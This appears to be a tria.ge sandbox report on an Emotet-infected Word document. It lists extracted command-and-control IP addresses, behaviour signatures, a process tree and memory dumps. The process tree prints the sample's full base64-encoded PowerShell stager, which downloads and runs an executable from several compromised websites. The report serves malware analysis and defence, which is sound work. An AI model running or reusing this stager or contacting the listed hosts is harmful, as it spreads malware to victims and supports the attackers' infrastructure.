Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    144s
  • resource
    win7

General

  • Target

    Docs_129a4380ebaff7cfc82bfe05e7d282ff.2

  • Sample

    191016-xb7dq9sjhx

  • SHA256

    012987f43b78cbbd7648fd8fbd4660423486e120f0a42cb155b0169a1f928e45

Score
N/A

Malware Config

Extracted

Family

emotet

C2

181.59.253.20:21

14.160.93.230:80

74.208.68.48:8080

104.131.58.132:8080

68.183.190.199:8080

62.75.143.100:7080

159.203.204.126:8080

151.80.142.33:80

123.168.4.66:22

46.28.111.142:7080

46.101.212.195:8080

183.82.97.25:80

190.10.194.42:8080

217.199.160.224:8080

186.1.41.111:443

185.86.148.222:8080

185.187.198.10:8080

200.57.102.71:8443

114.79.134.129:443

80.85.87.122:8080

rsa_pubkey.plain

Signatures

  • Suspicious behavior: AddClipboardFormatListener
  • Suspicious use of SetWindowsHookEx
  • Drops Office document 5 IoCs
  • Drops file in system dir 8 IoCs
  • Modifies registry class 1 TTPs 280 IoCs
  • Suspicious use of FindShellTrayWindow
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses
  • Uses Task Scheduler COM API 1 TTPs 12 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • Executes dropped EXE
  • Emotet Sync 1 IoCs
  • Suspicious behavior: EmotetMutantsSpam
  • Loads dropped DLL
  • emotet family

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_129a4380ebaff7cfc82bfe05e7d282ff.2.doc"
    1⤵
    • Drops Office document
    • Drops file in system dir
    • Modifies registry class
    PID:1924
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABPAEQARABCAEEARwBRAEEANABBADEAQQBBAD0AJwBBAHcAQQBCAEMAeABBAEcARwBBACcAOwAkAEIAQQBBAFgAVQBfAHgAdwAxACAAPQAgACcANQAwADYAJwA7ACQAVwBBADQAQQBBAEEAQwBCAEQAXwBCAFEAPQAnAFUAawBBAEQAMQB3AGMAXwAnADsAJABVAEQAVQBjAF8AQQBBADEAQQBfAEEAMQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQgBBAEEAWABVAF8AeAB3ADEAKwAnAC4AZQB4AGUAJwA7ACQAVABDAEEAWgBBAEcAVQBBAD0AJwBKAEMAXwBBAEEAVQB4AEIAQQBRAEIAUQAnADsAJABSAHgAVQBBAEEANABVAHcAUQBBAEEAQQB3AD0ALgAoACcAbgBlACcAKwAnAHcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAdAAuAFcARQBiAEMAbABJAEUATgBUADsAJABDAEEAWgAxAFUANABBAEIARwBfAEEAQQBBAD0AJwBoAHQAdABwAHMAOgAvAC8AeQBvAHUAcgBnAHAAcwBoAGUAbABwAGUAcgAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdgBoADYAMgAyADgANAAwADAALwAqAGgAdAB0AHAAcwA6AC8ALwBrAHkAbwBrAHUAcwBoAGkAbgBtAGkAZABkAGwAZQBlAGEAcwB0AC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AZAA0AGgAbwBiAHMAOAA4ADkALwAqAGgAdAB0AHAAcwA6AC8ALwB0AGEAbQBhAGsAbwBzAGgAaQBzAGEAbgBjAGgAYQByAC4AYwBvAG0ALwBoAHQAaAB6ADkAMQAvAGsANgBpAGwAeQBjAHgAMwA1ADMALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBiAGUAcgBnAGEAbQBhAGUAZwBlAHMAbwBuAGQAYQBqAC4AYwBvAG0ALwAxAHQAMgAwADEAMQAxAHkANgAzAC8AaQBjADUANQAwADEALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG8AcgBnAGEAbgBpAHoAZQByAHMAbwBuAGQAZQBtAGEAbgBkAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ANgB2AHQAZAA3ADMAMAA0AC8AJwAuACIAcwBwAEwAYABpAFQAIgAoACcAKgAnACkAOwAkAEcAUQBDAEQAWAB3AFEAVQBCAFEAQQBCAGsAPQAnAFMAQQBBAEIAQQBHAG8ARwBaAEEAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFkAeAB4ADEAXwBCAEEAdwBBAEEAQQAgAGkAbgAgACQAQwBBAFoAMQBVADQAQQBCAEcAXwBBAEEAQQApAHsAdAByAHkAewAkAFIAeABVAEEAQQA0AFUAdwBRAEEAQQBBAHcALgAiAEQAYABvAFcATgBsAGAATwBhAGQARgBpAGAATABFACIAKAAkAFkAeAB4ADEAXwBCAEEAdwBBAEEAQQAsACAAJABVAEQAVQBjAF8AQQBBADEAQQBfAEEAMQApADsAJABLAEIAQQBaAEMAUQBjAEEAbwA9ACcATgBjAGMAYwBEAEEAQwBBACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAVQBEAFUAYwBfAEEAQQAxAEEAXwBBADEAKQAuACIAbABgAEUAbgBnAGAAVABIACIAIAAtAGcAZQAgADIANQAzADYANgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAGAAVABhAFIAdAAiACgAJABVAEQAVQBjAF8AQQBBADEAQQBfAEEAMQApADsAJABZAFUAQQB3AFUAMQBEAG8APQAnAEgAeABVAEIAQQBBAEQAQQBBACcAOwBiAHIAZQBhAGsAOwAkAFoAeAAxAEIAQQBVAFEAQQBCAGsAQQA9ACcAWABBAEEAVQBBAFUAbwBjADEAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgA0AFUAMQBvAEIAVQBrAFUAPQAnAFIAXwBBAGMANAA0AEEAbwBEAEcARABrAEcAJwA=
    1⤵
    • Drops file in system dir
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1876
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-12847695641334994080-119316022019620575-8997152392125460370319131912-343644473"
    1⤵
      PID:1908
    • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
      "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
      1⤵
      • Uses Task Scheduler COM API
      PID:2000
    • C:\Users\Admin\506.exe
      "C:\Users\Admin\506.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:348
    • C:\Users\Admin\506.exe
      --dec73219
      1⤵
      • Drops file in system dir
      • Emotet Sync
      PID:984
    • C:\Windows\SysWOW64\loadarouter.exe
      "C:\Windows\SysWOW64\loadarouter.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1736
    • C:\Windows\SysWOW64\loadarouter.exe
      --f7a216da
      1⤵
      • Drops file in system dir
      • Suspicious use of WriteProcessMemory
      PID:388
    • C:\Windows\SysWOW64\GsZV0268lnEhyb.exe
      "C:\Windows\SysWOW64\GsZV0268lnEhyb.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1608
    • C:\Windows\SysWOW64\GsZV0268lnEhyb.exe
      --b9cdfb0c
      1⤵
      • Drops file in system dir
      PID:280
    • C:\Windows\SysWOW64\loadarouter.exe
      "C:\Windows\SysWOW64\loadarouter.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:2024
    • C:\Windows\SysWOW64\loadarouter.exe
      --f7a216da
      1⤵
        PID:1700

      Network

      MITRE ATT&CK Enterprise v16

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/280-23-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

      • memory/280-22-0x0000000000600000-0x0000000000617000-memory.dmp

        Filesize

        92KB

      • memory/348-6-0x0000000000230000-0x0000000000247000-memory.dmp

        Filesize

        92KB

      • memory/388-15-0x0000000000400000-0x000000000049F000-memory.dmp

        Filesize

        636KB

      • memory/388-14-0x00000000002D0000-0x00000000002E7000-memory.dmp

        Filesize

        92KB

      • memory/984-10-0x0000000000400000-0x000000000049F000-memory.dmp

        Filesize

        636KB

      • memory/984-9-0x00000000001C0000-0x00000000001D7000-memory.dmp

        Filesize

        92KB

      • memory/1608-19-0x0000000000320000-0x0000000000337000-memory.dmp

        Filesize

        92KB

      • memory/1700-27-0x00000000003E0000-0x00000000003F7000-memory.dmp

        Filesize

        92KB

      • memory/1700-28-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

      • memory/1736-12-0x00000000003B0000-0x00000000003C7000-memory.dmp

        Filesize

        92KB

      • memory/1924-1-0x000000000047B000-0x000000000047F000-memory.dmp

        Filesize

        16KB

      • memory/1924-0-0x0000000006120000-0x0000000006124000-memory.dmp

        Filesize

        16KB

      • memory/1924-2-0x0000000006305000-0x0000000006308000-memory.dmp

        Filesize

        12KB

      • memory/1924-3-0x00000000062BD000-0x00000000062BF000-memory.dmp

        Filesize

        8KB

      • memory/1924-4-0x0000000006308000-0x000000000630A000-memory.dmp

        Filesize

        8KB

      • memory/2024-25-0x0000000000240000-0x0000000000257000-memory.dmp

        Filesize

        92KB